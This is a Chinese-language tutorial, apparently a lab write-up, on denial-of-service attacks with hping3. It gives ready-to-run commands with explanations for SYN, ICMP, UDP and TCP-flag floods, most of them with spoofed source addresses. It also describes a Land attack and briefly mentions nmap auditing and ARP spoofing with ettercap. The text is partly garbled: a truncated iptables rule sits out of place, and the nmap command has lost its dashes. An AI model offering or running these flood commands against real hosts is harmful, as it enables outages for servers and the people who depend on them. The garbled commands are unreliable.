DoS***方法（hping3）

DoS***方法（hping3）
實驗

1、DOS with random source IP

root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com

參數含義：:
hping= 應用名稱.
-c 100000 =packets 發送的數量.
-d 120 = packet的大小.
-S = 只發送SYN packets.
-w 64 = TCP window的大小.
-p 21 = Destination port (21 being FTP port). 可以使用任意端口.
--flood = Sending packets as fast as possible, 不顯示迴應. Flood mode.
--rand-source = 使用隨機的Source IP Addresses. 或者使用 -a or spoof to hide hostnames.
www.hping3testsite.com = Destination IP address or target machines IP address. 或者使用 一個網址 In my case resolves to 127.0.0.1 (as entered in /etc/hosts file)

2、ICMP flood
ICMP的泛洪***是在最小時間內發送最大的ICMP數據到目標機，例如使用ping指令。在"舊"時代它使用一個巨大的ping（死亡之ping）是可能破壞機器，希望這些時間已經過去，但它仍有可能***任何機器的帶寬和處理時間，如果接受到這種ICMP數據包。
ICMP flood using hping 3 :
hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 56 --flood 192.168.0.2

-q 表示quiet, -n 表示無 name resolving, id 0 表示有ICMP echo request (ping)
-d i表示包的大小 (56 is the normal size for a ping).
某些系統配置中自動地丟棄這種通過hping生成的頭部設定不正確的ICMP包（例如不可能設置帶順序的ID）。在這種情況下，您可以使用Wireshark嗅探正常的ICMP回顯請求報文，將其保存爲二進制文件，並使用hping3重播。

Example:
hping3 -q -n --rawip -a 10.0.0.1 --ipproto 1 --file "./icmp_echo_request.bin" -d 64 --flood 192.168.0.2




3、UDP flood
這是相同的概念ICMP泛洪除非你發送大量的UDP數據。 UDP泛洪對網絡帶寬非常危險的。
Generating UDP flood:
hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.2
對於UDP，你必須精確的知道源和目的端口，這裏我選擇了DNS和BOOTPC（的dhclient）端口。該BOOTPC（68）端口經常在個人電腦開着，因爲大多數人使用DHCP來自己連接到網絡。
ame blacklist_180 --set -m comment --comment"Blacklist source IP" -j DROP

4、SYN flood
SYN泛洪是最常用的掃描技術，以及這樣做的原因是因爲它是最危險的。 SYN泛洪在於發送大量的TCP數據包只有SYN標誌。因爲SYN報文用來打開一個TCP連接，受害人的主機將嘗試打開這些連接。這些連接，存儲的連接表中，將繼續開放一定的時間，而***者不斷涌入與SYN數據包。一旦受害者的連接表被填滿時，它不會接受任何新的連接，因此，如果它是一個服務器這意味着它已不再被任何人訪問。
Example of a SYN flood attack :
hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.2

5、Other TCP flood attacks
有許多使用TCP泛洪的可能性。如你所願剛纔設置的各種TCP標誌。某些TCP泛洪技術包括制定了很多不尋常的標誌擾亂。例如與SARFU掃描
Example with the SARFU scan :
hping3 -q -n -a 10.0.0.1 -SARFU -p 22 --flood 192.168.0.2


6、Land***
Land***原理是：用一個特別打造的SYN包，它的原地址和目標地址都被設置成某一個服務器地址。此舉將導致接受服務器向它自己的地址發送SYN-ACK消息，結果這個地址又發回ACK消息並創建一個空連接。被***的服務器每接收一個這樣的連接都將保留，直到超時，對Land***反應不同，許多UNIX實現將崩潰，NT變的極其緩慢(大約持續5分鐘)

7、nmap掃描 確定開放端口
Network Mapper，是Linux下的一個網絡連接端掃描軟件，用來掃描網上電腦開放的網絡連接端。確定哪些服務運行在哪些連接端，並且推斷計算機運行哪個操作系統
verify and test that your firewall filters and rules are performing as intended

nmap v sA n www.yourorg.com oA firewallaudit

8、ARP***/ARP欺騙
工具： ettercap